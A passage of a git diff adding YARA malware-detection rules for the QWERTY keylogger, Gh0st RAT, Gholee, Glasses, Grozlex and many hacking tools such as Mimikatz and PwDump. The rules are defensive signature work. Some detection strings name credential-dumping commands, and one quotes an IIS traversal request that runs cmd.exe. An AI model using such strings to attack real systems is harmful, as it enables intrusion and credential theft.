+}
+
+rule FiveEyes_QUERTY_Malwaresig_20120_cmdDef {
+ meta:
+ description = "FiveEyes QUERTY Malware - file 20120_cmdDef.xml"
+ author = "Florian Roth"
+ reference = "http://www.spiegel.de/media/media-35668.pdf"
+ date = "2015/01/18"
+ hash = "cda9ceaf0a39d6b8211ce96307302a53dfbd71ea"
+ strings:
+ $s0 = "This PPC gets the current keystroke log." fullword ascii
+ $s1 = "This command will add the given WindowTitle to the list of Windows to log keys f" ascii
+ $s2 = "This command will remove the WindowTitle corresponding to the given window title" ascii
+ $s3 = "This command will return the current status of the Keyboard Logger (Whether it i" ascii
+ $s4 = "This command Toggles logging of all Keys. If allkeys is toggled all keystrokes w" ascii
+ $s5 = "<definition>Turn logging of all keys on|off</definition>" fullword ascii
+ $s6 = "<name>Get Keystroke Log</name>" fullword ascii
+ $s7 = "<description>Keystroke Logger Lp Plugin</description>" fullword ascii
+ $s8 = "<definition>display help for this function</definition>" fullword ascii
+ $s9 = "This command will switch ON Logging of keys. All keys taht are entered to a acti" ascii
+ $s10 = "Set the log limit (in number of windows)" fullword ascii
+ $s11 = "<example>qwgetlog</example>" fullword ascii
+ $s12 = "<aliasName>qwgetlog</aliasName>" fullword ascii
+ $s13 = "<definition>The title of the Window whose keys you wish to Log once it becomes a" ascii
+ $s14 = "This command will switch OFF Logging of keys. No keystrokes will be captured" fullword ascii
+ $s15 = "<definition>The title of the Window whose keys you no longer whish to log</defin" ascii
+ $s16 = "<command id=\"32\">" fullword ascii
+ $s17 = "<command id=\"3\">" fullword ascii
+ $s18 = "<command id=\"7\">" fullword ascii
+ $s19 = "<command id=\"1\">" fullword ascii
+ $s20 = "<command id=\"4\">" fullword ascii
+ condition:
+ 10 of them
+}
+
+rule FiveEyes_QUERTY_Malwareqwerty_20120 {
+ meta:
+ description = "FiveEyes QUERTY Malware - file 20120.xml"
+ author = "Florian Roth"
+ reference = "http://www.spiegel.de/media/media-35668.pdf"
+ date = "2015/01/18"
+ hash = "597082f05bfd3225587d480c30f54a7a1326a892"
+ strings:
+ $s0 = "<configFileName>20120_cmdDef.xml</configFileName>" fullword ascii
+ $s1 = "<name>20120.dll</name>" fullword ascii
+ $s2 = "<codebase>\"Reserved for future use.\"</codebase>" fullword ascii
+ $s3 = "<plugin xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:noNamespaceS" ascii
+ $s4 = "<platform type=\"1\">" fullword ascii
+ $s5 = "</plugin>" fullword ascii
+ $s6 = "</pluginConfig>" fullword ascii
+ $s7 = "<pluginConfig>" fullword ascii
+ $s8 = "</platform>" fullword ascii
+ $s9 = "</lpConfig>" fullword ascii
+ $s10 = "<lpConfig>" fullword ascii
+ condition:
+ all of them
+}
+
+rule FiveEyes_QUERTY_Malwaresig_20121_cmdDef {
+ meta:
+ description = "FiveEyes QUERTY Malware - file 20121_cmdDef.xml"
+ author = "Florian Roth"
+ reference = "http://www.spiegel.de/media/media-35668.pdf"
+ date = "2015/01/18"
+ hash = "64ac06aa4e8d93ea6063eade7ce9687b1d035907"
+ strings:
+ $s0 = "<shortDescription>Keystroke Logger Plugin.</shortDescription>" fullword ascii
+ $s1 = "<message>Failed to get File Time</message>" fullword ascii
+ $s2 = "<description>Keystroke Logger Plugin.</description>" fullword ascii
+ $s3 = "<message>Failed to set File Time</message>" fullword ascii
+ $s4 = "</commands>" fullword ascii
+ $s5 = "<commands>" fullword ascii
+ $s6 = "</version>" fullword ascii
+ $s7 = "<associatedImplantId>20120</associatedImplantId>" fullword ascii
+ $s8 = "<message>No Comms. with Driver</message>" fullword ascii
+ $s9 = "</error>" fullword ascii
+ $s10 = "<message>Invalid File Size</message>" fullword ascii
+ $s11 = "<platforms>Windows (User/Win32)</platforms>" fullword ascii
+ $s12 = "<message>File Size Mismatch</message>" fullword ascii
+ $s13 = "<projectpath>plugin/Utility</projectpath>" fullword ascii
+ $s14 = "<pluginsDepend>None</pluginsDepend>" fullword ascii
+ $s15 = "<dllDepend>None</dllDepend>" fullword ascii
+ $s16 = "<pluginname>E_QwertyIM</pluginname>" fullword ascii
+ $s17 = "<rightsRequired>None</rightsRequired>" fullword ascii
+ $s18 = "<minorType>0</minorType>" fullword ascii
+ $s19 = "<code>00001002</code>" fullword ascii
+ $s20 = "<code>00001001</code>" fullword ascii
+ condition:
+ 12 of them
+}
diff --git a/malware/Gh0st.yar b/malware/Gh0st.yar
new file mode 100644
index 0000000..7689ffc
--- /dev/null
+++ b/malware/Gh0st.yar
@@ -0,0 +1,70 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT_WIN_Gh0st_ver
+{
+meta:
+ author = "@BryanNolen"
+ date = "2012-12"
+ type = "APT"
+ version = "1.1"
+ ref = "Detection of Gh0st RAT server DLL component"
+ ref1 = "http://www.mcafee.com/au/resources/white-papers/foundstone/wp-know-your-digital-enemy.pdf"
+ strings:
+ $library = "deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly"
+ $capability = "GetClipboardData"
+ $capability1 = "capCreateCaptureWindowA"
+ $capability2 = "CreateRemoteThread"
+ $capability3 = "WriteProcessMemory"
+ $capability4 = "LsaRetrievePrivateData"
+ $capability5 = "AdjustTokenPrivileges"
+ $function = "ResetSSDT"
+ $window = "WinSta0\\Default"
+ $magic = {47 6C 6F 62 61 6C 5C [5-9] 20 25 64} /* $magic = "Gh0st" */
+ condition:
+ all of them
+}
+
+rule Gh0st
+{
+ meta:
+ description = "Gh0st"
+ author = "botherder https://github.com/botherder"
+
+ strings:
+ $ = /(G)host/
+ $ = /(i)nflate 1\.1\.4 Copyright 1995-2002 Mark Adler/
+ $ = /(d)eflate 1\.1\.4 Copyright 1995-2002 Jean-loup Gailly/
+ $ = /(%)s\\shell\\open\\command/
+ $ = /(G)etClipboardData/
+ $ = /(W)riteProcessMemory/
+ $ = /(A)djustTokenPrivileges/
+ $ = /(W)inSta0\\Default/
+ $ = /(#)32770/
+ $ = /(#)32771/
+ $ = /(#)32772/
+ $ = /(#)32774/
+
+ condition:
+ all of them
+}
+
+rule gh0st
+
+{
+
+meta:
+ author = "https://github.com/jackcr/"
+
+ strings:
+ $a = { 47 68 30 73 74 ?? ?? ?? ?? ?? ?? ?? ?? 78 9C }
+ $b = "Gh0st Update"
+
+ condition:
+ any of them
+
+}
diff --git a/malware/Gholee.yar b/malware/Gholee.yar
new file mode 100644
index 0000000..f36c503
--- /dev/null
+++ b/malware/Gholee.yar
@@ -0,0 +1,55 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule gholeeV1
+{
+ meta:
+ Author = "@GelosSnake"
+ Date = "2014/08"
+ Description = "Gholee first discovered variant "
+ Reference = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"
+
+ strings:
+ $a = "sandbox_avg10_vc9_SP1_2011"
+ $b = "gholee"
+
+ condition:
+ all of them
+}
+
+rule gholeeV2
+{
+ meta:
+ Author = "@GelosSnake"
+ Date = "2015-02-12"
+ Description = "Gholee first discovered variant "
+ Reference = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"
+
+ strings:
+ $string0 = "RichHa"
+ $string1 = " ((((( H" wide
+ $string2 = "1$1,141<1D1L1T1\\1d1l1t1"
+ $string3 = "<8;$O' "
+ $string4 = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]"
+ $string5 = "jYPQTVTSkllZTTXRTUiHceWda/"
+ $string6 = "urn:schemas-microsoft-com:asm.v1"
+ $string7 = "8.848H8O8i8s8y8"
+ $string8 = "wrapper3" wide
+ $string9 = "pwwwwwwww"
+ $string10 = "Sunday"
+ $string11 = "YYuTVWh"
+ $string12 = "DDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDIN"
+ $string13 = "ytMMMMMMUbbrrrrrxxxxxxxxrriUMMMMMMMMMUuzt"
+ $string15 = "wrapper3 Version 1.0" wide
+ $string16 = "77A779"
+ $string17 = "<C<G<M<R<X<"
+ $string18 = "9 9-9N9X9s9"
+
+ condition:
+ 18 of them
+}
+
diff --git a/malware/Glasses.yar b/malware/Glasses.yar
new file mode 100644
index 0000000..ede7bba
--- /dev/null
+++ b/malware/Glasses.yar
@@ -0,0 +1,50 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule GlassesCode : Glasses Family
+{
+ meta:
+ description = "Glasses code features"
+ author = "Seth Hardy"
+ last_modified = "2014-07-22"
+
+ strings:
+ $ = { B8 AB AA AA AA F7 E1 D1 EA 8D 04 52 2B C8 }
+ $ = { B8 56 55 55 55 F7 E9 8B 4C 24 1C 8B C2 C1 E8 1F 03 D0 49 3B CA }
+
+ condition:
+ any of them
+}
+
+rule GlassesStrings : Glasses Family
+{
+ meta:
+ description = "Strings used by Glasses"
+ author = "Seth Hardy"
+ last_modified = "2014-07-22"
+
+ strings:
+ $ = "thequickbrownfxjmpsvalzydg"
+ $ = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; %s.%s)"
+ $ = "\" target=\"NewRef\"></a>"
+
+ condition:
+ all of them
+
+}
+
+rule Glasses : Family
+{
+ meta:
+ description = "Glasses family"
+ author = "Seth Hardy"
+ last_modified = "2014-07-22"
+
+ condition:
+ GlassesCode or GlassesStrings
+
+}
diff --git a/malware/Grozlex.yar b/malware/Grozlex.yar
new file mode 100644
index 0000000..48eb014
--- /dev/null
+++ b/malware/Grozlex.yar
@@ -0,0 +1,20 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Grozlex : Stealer
+{
+ meta:
+ author="Kevin Falcoz"
+ date="20/08/2013"
+ description="Grozlex Stealer - Possible HCStealer"
+
+ strings:
+ $signature={4C 00 6F 00 67 00 73 00 20 00 61 00 74 00 74 00 61 00 63 00 68 00 65 00 64 00 20 00 62 00 79 00 20 00 69 00 43 00 6F 00 7A 00 65 00 6E}
+
+ condition:
+ $signature
+}
diff --git a/malware/HackTools.yar b/malware/HackTools.yar
new file mode 100644
index 0000000..30913a3
--- /dev/null
+++ b/malware/HackTools.yar
@@ -0,0 +1,3241 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule PwDump
+{
+ meta:
+ description = "PwDump 6 variant"
+ author = "Marc Stroebel"
+ date = "2014-04-24"
+ score = 70
+ strings:
+ $s5 = "Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineNa"
+ $s6 = "Unable to query service status. Something is wrong, please manually check the st"
+ $s7 = "pwdump6 Version %s by fizzgig and the mighty group at foofus.net" fullword
+ condition:
+ all of them
+}
+
+rule PScan_Portscan_1 {
+ meta:
+ description = "PScan - Port Scanner"
+ author = "F. Roth"
+ score = 50
+ strings:
+ $a = "00050;0F0M0X0a0v0}0"
+ $b = "vwgvwgvP76"
+ $c = "Pr0PhOFyP"
+ condition:
+ all of them
+}
+
+rule HackTool_Samples {
+ meta:
+ description = "Hacktool"
+ score = 50
+ strings:
+ $a = "Unable to uninstall the fgexec service"
+ $b = "Unable to set socket to sniff"
+ $c = "Failed to load SAM functions"
+ $d = "Dump system passwords"
+ $e = "Error opening sam hive or not valid file"
+ $f = "Couldn't find LSASS pid"
+ $g = "samdump.dll"
+ $h = "WPEPRO SEND PACKET"
+ $i = "WPE-C1467211-7C89-49c5-801A-1D048E4014C4"
+ $j = "Usage: unshadow PASSWORD-FILE SHADOW-FILE"
+ $k = "arpspoof\\Debug"
+ $l = "Success: The log has been cleared"
+ $m = "clearlogs [\\\\computername"
+ $n = "DumpUsers 1."
+ $o = "dictionary attack with specified dictionary file"
+ $p = "by Objectif Securite"
+ $q = "objectif-securite"
+ $r = "Cannot query LSA Secret on remote host"
+ $s = "Cannot write to process memory on remote host"
+ $t = "Cannot start PWDumpX service on host"
+ $u = "usage: %s <system hive> <security hive>"
+ $v = "username:domainname:LMhash:NThash"
+ $w = "<server_name_or_ip> | -f <server_list_file> [username] [password]"
+ $x = "Impersonation Tokens Available"
+ $y = "failed to parse pwdump format string"
+ $z = "Dumping password"
+ condition:
+ 1 of them
+}
+
+rule HackTool_Producers {
+ meta: description = "Hacktool Producers String" threat_level = 5 score = 50
+ strings:
+ $a1 = "www.oxid.it"
+ $a2 = "www.analogx.com"
+ $a3 = "ntsecurity.nu"
+ $a4 = "gentilkiwi.com"
+ $a6 = "Marcus Murray"
+ $extension = /extension: \.(ini|xml)\n/
+ condition: 1 of ($a*) and not $extension
+}
+
+/* Mimikatz */
+
+rule Mimikatz_Memory_Rule_1 : APT {
+ meta:
+ author = "Florian Roth"
+ date = "12/22/2014"
+ score = 70
+ type = "memory"
+ description = "Detects password dumper mimikatz in memory"
+ strings:
+ $s1 = "sekurlsa::msv" fullword ascii
+ $s2 = "sekurlsa::wdigest" fullword ascii
+ $s4 = "sekurlsa::kerberos" fullword ascii
+ $s5 = "sekurlsa::tspkg" fullword ascii
+ $s6 = "sekurlsa::livessp" fullword ascii
+ $s7 = "sekurlsa::ssp" fullword ascii
+ $s8 = "sekurlsa::logonPasswords" fullword ascii
+ $s9 = "sekurlsa::process" fullword ascii
+ $s10 = "ekurlsa::minidump" fullword ascii
+ $s11 = "sekurlsa::pth" fullword ascii
+ $s12 = "sekurlsa::tickets" fullword ascii
+ $s13 = "sekurlsa::ekeys" fullword ascii
+ $s14 = "sekurlsa::dpapi" fullword ascii
+ $s15 = "sekurlsa::credman" fullword ascii
+ condition:
+ 1 of them
+}
+
+rule Mimikatz_Memory_Rule_2 : APT {
+ meta:
+ description = "Mimikatz Rule generated from a memory dump"
+ author = "Florian Roth - Florian Roth"
+ type = "memory"
+ score = 80
+ strings:
+ $s0 = "sekurlsa::" ascii
+ $x1 = "cryptprimitives.pdb" ascii
+ $x2 = "Now is t1O" ascii fullword
+ $x4 = "ALICE123" ascii
+ $x5 = "BOBBY456" ascii
+ condition:
+ $s0 and 1 of ($x*)
+}
+
+rule Mimikatz_SampleSet_1 : APT {
+ meta:
+ description = "Mimikatz Rule generated from a big Mimikatz sample set"
+ author = "Florian Roth - Florian Roth"
+ hash1 = "9ef9762169e8b44d01613234927f44d6"
+ hash2 = "35b34bb9f1ad0fdf48dc090ed4a8190f"
+ hash3 = "516fde1fe06f96a019c3ad063c78b760"
+ hash4 = "faf248ee5184b65d28786d91c02864a6"
+ hash5 = "5847659129c4e711809ab5b6ab1b8bd8"
+ score = 80
+ strings:
+ $s0 = "mimikatz_trunk/Win32/mimidrv.sys" fullword
+ $s1 = "Mimikatz 2.0\\x64\\mimidrv.sys" fullword
+ $s2 = "32\\kelloworld.dll"
+ $s3 = "64\\kelloworld.dll"
+ $s4 = "32/kelloworld.dll"
+ $s5 = "64/kelloworld.dll"
+ $s6 = "mimidrv.sys" fullword
+ $s7 = "sekurlsa.lib" fullword
+ $s8 = "mimilib.dll" fullword
+ $s9 = "mimikatz.exe" fullword
+ condition:
+ 3 of them
+}
+rule Mimikatz_SampleSet_2 : APT {
+ meta:
+ description = "Mimikatz Rule generated from a big Mimikatz sample set"
+ author = "Florian Roth - Florian Roth"
+ hash = "6f14b6744aad66ac017ab7733cdb51ad"
+ score = 50
+ strings:
+ $s0 = "notsupported" fullword
+ $s1 = "getKerberos" fullword
+ $s2 = "M(knN0123456789abcdefghijklmnopqrstuvwxyz" fullword
+ $s3 = "getLiveSSPFunctions" fullword
+ $s4 = "getKerberosFunctions" fullword
+ $s5 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><tr"
+ $s6 = ".?AV_System_error@std@@" fullword
+ $s7 = "getCredmanFunctions" fullword
+ $s8 = "find_tokens" fullword
+ condition:
+ all of them
+}
+
+rule Mimikatz_SampleSet_3 : APT {
+ meta:
+ description = "Mimikatz Rule generated from a big Mimikatz sample set"
+ author = "Florian Roth - Florian Roth"
+ hash = "f62848e3cd2f0316608c2696c6504b4a"
+ score = 50
+ strings:
+ $s8 = "x64/intra.kirbi" fullword
+ $s9 = "x64/intra.kirbi*kb" fullword
+ condition:
+ all of them
+}
+
+rule Mimikatz_SampleSet_4 : APT {
+ meta:
+ description = "Mimikatz Rule generated from a big Mimikatz sample set"
+ author = "Florian Roth - Florian Roth"
+ hash1 = "8991aeef8b33049c5997c59afcea4a27"
+ hash2 = "a3e00b039f2d2ea04a4274506dd83be0"
+ hash3 = "cb5d40cc8db79c3d24f20f443f7e5926"
+ score = 40
+ strings:
+ $s0 = "notsupported" fullword
+ $s1 = "getLiveSSP" fullword
+ $s2 = "getKerberos" fullword
+ $s3 = "getLiveSSPFunctions" fullword
+ $s4 = "getKerberosFunctions" fullword
+ $s5 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><tr"
+ $s6 = "getCredmanFunctions" fullword
+ $s7 = "getCredman" fullword
+ $s8 = "find_tokens" fullword
+ condition:
+ all of them
+}
+
+rule Mimikatz_SampleSet_5 : APT {
+ meta:
+ description = "Mimikatz Rule generated from a big Mimikatz sample set"
+ author = "Florian Roth - Florian Roth"
+ hash1 = "9ca015f05cc4cbae8d50bcd067e6d605"
+ score = 50
+ strings:
+ $s6 = "mimidrv.sys" fullword
+ condition:
+ all of them
+}
+rule Mimikatz_SampleSet_6 : APT {
+ meta:
+ description = "Mimikatz Rule generated from a big Mimikatz sample set"
+ author = "Florian Roth - Florian Roth"
+ hash = "739c80bac405eb1b0ebbe10a75515ff1"
+ strings:
+ $s1 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><tr"
+ $s2 = "Erreur : impossible d'ouvrir le bureau cible (" fullword
+ condition:
+ all of them
+}
+
+rule Mimikatz_SampleSet_7 : APT {
+ meta:
+ description = "Mimikatz Rule generated from a big Mimikatz sample set"
+ author = "Florian Roth - Florian Roth"
+ super_rule = 1
+ hash0 = "821e5dc1ad4bbad2958e036c84bf7734"
+ hash1 = "e39e57fb7ff38e7be1a8da785ef83557"
+ hash2 = "9ecb8020b0989778009d5aaf13640ea4"
+ hash3 = "4bfe2b27a63678fa6b4bd27c8d309508"
+ hash4 = "fb164aadc2ae4a7aa3fc3f54cd8fa92a"
+ hash5 = "33786d2823e6d5e75b1a3a8bb2837b40"
+ hash6 = "a4c1feb5f3f5a71320aeca588cb1f14c"
+ hash7 = "36fc962a871cfb9f7d31dc9faaab5b54"
+ hash8 = "35bc4af0cbaa48e8a72884e3e690fc3b"
+ hash9 = "f1de7a81394efe6cc9438033a75cae0d"
+ hash10 = "a6e0cf20f2de5149885297188644f123"
+ hash11 = "bb7d4174e9ffae01a14993c528de8653"
+ hash12 = "ffd3df1ee7bfd6f1255221c3f82478f1"
+ hash13 = "eaf8dfbe80c42dd92740a9e71ea444ab"
+ hash14 = "e25b75621c03da7addc55dac378d77c4"
+ hash15 = "41ea9b05bcfceca78d51f776bfdee393"
+ hash16 = "a03a4272be8a2ee5e48ba2c417ff3b5b"
+ hash17 = "96501f7e9dc19a4012b1f5db1dce7018"
+ hash18 = "b6fe1b2e961c294155d8f48b6c57f28f"
+ hash19 = "1680c6afebcb77a21b6619aedc304931"
+ hash20 = "46820c90b2fb296e26b4bb8f7cad51ac"
+ hash21 = "a21634571795601f5eace5d503246b3b"
+ hash22 = "e6dda29f842ce3b7c72b5536fab4f860"
+ hash23 = "006480db3303a7ba9d73e32bc6c0bc11"
+ hash24 = "efa68dd73410c4be6f6b0a95a02762f2"
+ hash25 = "7194944aa418851631d7e614ff430b0a"
+ hash26 = "3a98b9190bf6ed5f75d9c3950a63dd08"
+ hash27 = "02f7536279480b73c9942c072c1b5316"
+ hash28 = "8638370c805dc92581eba34fa57eb45e"
+ hash29 = "6f393ab258b87790a45d6d2b125bbc24"
+ hash30 = "dbb01a015ab11266bae5d6381ffd41c2"
+ score = 80
+ strings:
+ $s0 = "# * Kernel mode * #" fullword
+ $s1 = "kerberos!KerbGlobalLogonSessionTable" fullword
+ $s2 = "Authentication Id : %u ; %u (%08x:%08x)" fullword
+ $s3 = "%p - lsasrv!InitializationVector" fullword
+ $s4 = "%p - lsasrv!LogonSessionListCount" fullword
+ $s7 = "# * User mode * #" fullword
+ $s8 = "## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )"
+ $s9 = "livessp!LiveGlobalLogonSessionList" fullword
+ condition:
+ all of them
+}
+rule Mimikatz_SampleSet_8 : APT {
+ meta:
+ description = "Mimikatz Rule generated from a big Mimikatz sample set"
+ author = "Florian Roth - Florian Roth"
+ super_rule = 1
+ hash0 = "0a10fe0a341ac0b24347f183c83123cc"
+ hash1 = "d7e16bc11cdfc0f781e87f5df4ae24a5"
+ hash2 = "abdb41e32c447e703b03c9e307565ed3"
+ score = 40
+ strings:
+ $s0 = "?!?(?0?8?@?H?P?X?`?n?w?" fullword
+ $s1 = "2\"2'2.24292@2F2K2R2X2]2d2j2o2v2|2" fullword
+ $s2 = "7!7<7C7P7V7^7d7r7" fullword
+ $s3 = "0#0)0=0E0K0[0c0i0" fullword
+ $s4 = "878E8L8Y8`8f8l8r8" fullword
+ $s5 = ":*:/:7:=:B:I:O:T:[:a:f:m:s:x:" fullword
+ $s6 = "<'<4<9<D<K<Q<X<e<j<u<{<" fullword
+ $s7 = "8&878?8M8R8]8d8q8~8" fullword
+ $s8 = ";,;2;A;F;L;_;d;k;q;" fullword
+ $s9 = "3%3+31373=3C3I3N3_3s3" fullword
+ condition:
+ all of them
+}
+rule Mimikatz_SampleSet_9 : APT {
+ meta:
+ description = "Mimikatz Rule generated from a big Mimikatz sample set"
+ author = "Florian Roth - Florian Roth"
+ super_rule = 1
+ hash0 = "6e2eda476c141c63ff62c92d8b52ff7e"
+ hash1 = "f42b75103230cab39e4c58d5b0dca2c4"
+ hash2 = "dc6f62e3a0b584cb134633a12fd7d7b8"
+ hash3 = "d5918d735a23f746f0e83f724c4f26e5"
+ hash4 = "e98b714ccd14e61f776cc55a602d2dd0"
+ hash5 = "09a6e5cc589a485d9ab4eda772b46f2a"
+ hash6 = "4a51faef37af8b70fc9cf7c64f030b25"
+ hash7 = "e52e30811287426d4eef089a65cc2acf"
+ hash8 = "cd1606a1800150a33dea71d3f3ee9aed"
+ hash9 = "510fe825464dca92aadcd3d8289405aa"
+ hash10 = "0be87e16eb598006358cdaa9dfcd5af5"
+ hash11 = "1f0ce022ee9fe8d92235809eda73ce38"
+ hash12 = "e172a38ade3aa0a2bc1bf9604a54a3b5"
+ hash13 = "de20bddb9c3b1b09d980db5bbb5b5789"
+ hash14 = "c77db1ddffc7e6edac60bb5ca9a6e863"
+ hash15 = "6d8008edd86c5ca1a112018852777b1e"
+ hash16 = "525d6ca1446b01f912303f04f0c713ab"
+ score = 70
+ strings:
+ $s6 = "\\i386\\mimidrv.pdb"
+ condition:
+ all of them
+}
+rule Mimikatz_SampleSet_10 : APT {
+ meta:
+ description = "Mimikatz Rule generated from a big Mimikatz sample set"
+ author = "Florian Roth - Florian Roth"
+ super_rule = 1
+ hash0 = "5522fd8fe2e205b30f9e74a94da0352d"
+ hash1 = "ec428ed7d1cc4ba3023696ddc138a376"
+ hash2 = "13e88493f844a0df3352cd721bfa41a6"
+ hash3 = "483e5365e1f1d83c2dcd4bdb398e779f"
+ hash4 = "04d04a1f0ff9e2ff1d35b8c2950cce53"
+ hash5 = "97cbbd6c4153ae4a410439e2c02d77ce"
+ hash6 = "b43dfc8be8db7eacfc993e323229fb9f"
+ hash7 = "72e95180a2e4ab59e1b7c10f1054740a"
+ hash8 = "eaaecd5bd100923c72d2b39d84dfd411"
+ hash9 = "a8ae792f0384fd3e7f411c826b48b7c8"
+ score = 40
+ strings:
+ $s0 = "D$hL9(t" fullword
+ $s1 = "l$LfD9o" fullword
+ $s2 = "AHH90t?L" fullword
+ $s3 = "M9Qpv\"I9Ips" fullword
+ $s4 = "tSD8T$<u" fullword
+ $s5 = ";f9T$Xw" fullword
+ $s6 = "6f9L$Xw" fullword
+ $s7 = "f;\\$@u1E3" fullword
+ $s8 = "8\\$8uFH" fullword
+ $s9 = "L$DfD;O" fullword
+ condition:
+ all of them
+}
+
+/* Removed Mimikatz samples set super rules 11 - 27 */
+
+/* Disclosed hack tool set */
+
+rule Fierce2
+{
+ meta:
+ author = "Florian Roth"
+ description = "This signature detects the Fierce2 domain scanner"
+ date = "07/2014"
+ score = 60
+ strings:
+ $s1 = "$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,"
+ condition:
+ 1 of them
+}
+
+rule Ncrack
+{
+ meta:
+ author = "Florian Roth"
+ description = "This signature detects the Ncrack brute force tool"
+ date = "07/2014"
+ score = 60
+ strings:
+ $s1 = "NcrackOutputTable only supports adding up to 4096 to a cell via"
+ condition:
+ 1 of them
+}
+
+rule SQLMap
+{
+ meta:
+ author = "Florian Roth"
+ description = "This signature detects the SQLMap SQL injection tool"
+ date = "07/2014"
+ score = 60
+ strings:
+ $s1 = "except SqlmapBaseException, ex:"
+ condition:
+ 1 of them
+}
+
+rule PortScanner {
+ meta:
+ description = "Auto-generated rule on file PortScanner.exe"
+ author = "yarGen Yara Rule Generator by Florian Roth"
+ hash = "b381b9212282c0c650cb4b0323436c63"
+ strings:
+ $s0 = "Scan Ports Every"
+ $s3 = "Scan All Possible Ports!"
+ condition:
+ all of them
+}
+
+rule DomainScanV1_0 {
+ meta:
+ description = "Auto-generated rule on file DomainScanV1_0.exe"
+ author = "yarGen Yara Rule Generator by Florian Roth"
+ hash = "aefcd73b802e1c2bdc9b2ef206a4f24e"
+ strings:
+ $s0 = "dIJMuX$aO-EV"
+ $s1 = "XELUxP\"-\\"
+ $s2 = "KaR\"U'}-M,."
+ $s3 = "V.)\\ZDxpLSav"
+ $s4 = "Decompress error"
+ $s5 = "Can't load library"
+ $s6 = "Can't load function"
+ $s7 = "com0tl32:.d"
+ condition:
+ all of them
+}
+
+rule MooreR_Port_Scanner {
+ meta:
+ description = "Auto-generated rule on file MooreR Port Scanner.exe"
+ author = "yarGen Yara Rule Generator by Florian Roth"
+ hash = "376304acdd0b0251c8b19fea20bb6f5b"
+ strings:
+ $s0 = "Description|"
+ $s3 = "soft Visual Studio\\VB9yp"
+ $s4 = "adj_fptan?4"
+ $s7 = "DOWS\\SyMem32\\/o"
+ condition:
+ all of them
+}
+
+rule NetBIOS_Name_Scanner {
+ meta:
+ description = "Auto-generated rule on file NetBIOS Name Scanner.exe"
+ author = "yarGen Yara Rule Generator by Florian Roth"
+ hash = "888ba1d391e14c0a9c829f5a1964ca2c"
+ strings:
+ $s0 = "IconEx"
+ $s2 = "soft Visual Stu"
+ $s4 = "NBTScanner!y&"
+ condition:
+ all of them
+}
+
+rule FeliksPack3___Scanners_ipscan {
+ meta:
+ description = "Auto-generated rule on file ipscan.exe"
+ author = "yarGen Yara Rule Generator by Florian Roth"
+ hash = "6c1bcf0b1297689c8c4c12cc70996a75"
+ strings:
+ $s2 = "WCAP;}ECTED"
+ $s4 = "NotSupported"
+ $s6 = "SCAN.VERSION{_"
+ condition:
+ all of them
+}
+
+rule CGISscan_CGIScan {
+ meta:
+ description = "Auto-generated rule on file CGIScan.exe"
+ author = "yarGen Yara Rule Generator by Florian Roth"
+ hash = "338820e4e8e7c943074d5a5bc832458a"
+ strings:
+ $s2 = "WSocketResolveHost: Cannot convert host address '%s'"
+ $s3 = "tcp is the only protocol supported thru socks server"
+
+ $path1 = /filepath: .{,70}EPO.{,70}\n/
+ condition:
+ $s2 and $s3 and not $path1
+}
+
+rule IP_Stealing_Utilities {
+ meta:
+ description = "Auto-generated rule on file IP Stealing Utilities.exe"
+ author = "yarGen Yara Rule Generator by Florian Roth"
+ hash = "65646e10fb15a2940a37c5ab9f59c7fc"
+ strings:
+ $s0 = "DarkKnight"
+ $s9 = "IPStealerUtilities"
+ condition:
+ all of them
+}
+
+rule SuperScan4 {
+ meta:
+ description = "Auto-generated rule on file SuperScan4.exe"
+ author = "yarGen Yara Rule Generator by Florian Roth"
+ hash = "78f76428ede30e555044b83c47bc86f0"
+ strings:
+ $s2 = " td class=\"summO1\">"
+ $s6 = "REM'EBAqRISE"
+ $s7 = "CorExitProcess'msc#e"
+ condition:
+ all of them
+
+}
+rule PortRacer {
+ meta:
+ description = "Auto-generated rule on file PortRacer.exe"
+ author = "yarGen Yara Rule Generator by Florian Roth"
+ hash = "2834a872a0a8da5b1be5db65dfdef388"
+ strings:
+ $s0 = "Auto Scroll BOTH Text Boxes"
+ $s4 = "Start/Stop Portscanning"
+ $s6 = "Auto Save LogFile by pressing STOP"
+ condition:
+ all of them
+}
+
+rule scanarator {
+ meta:
+ description = "Auto-generated rule on file scanarator.exe"
+ author = "yarGen Yara Rule Generator by Florian Roth"
+ hash = "848bd5a518e0b6c05bd29aceb8536c46"
+ strings:
+ $s4 = "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
+ condition:
+ all of them
+}
+
+rule aolipsniffer {
+ meta:
+ description = "Auto-generated rule on file aolipsniffer.exe"
+ author = "yarGen Yara Rule Generator by Florian Roth"
+ hash = "51565754ea43d2d57b712d9f0a3e62b8"
+ strings:
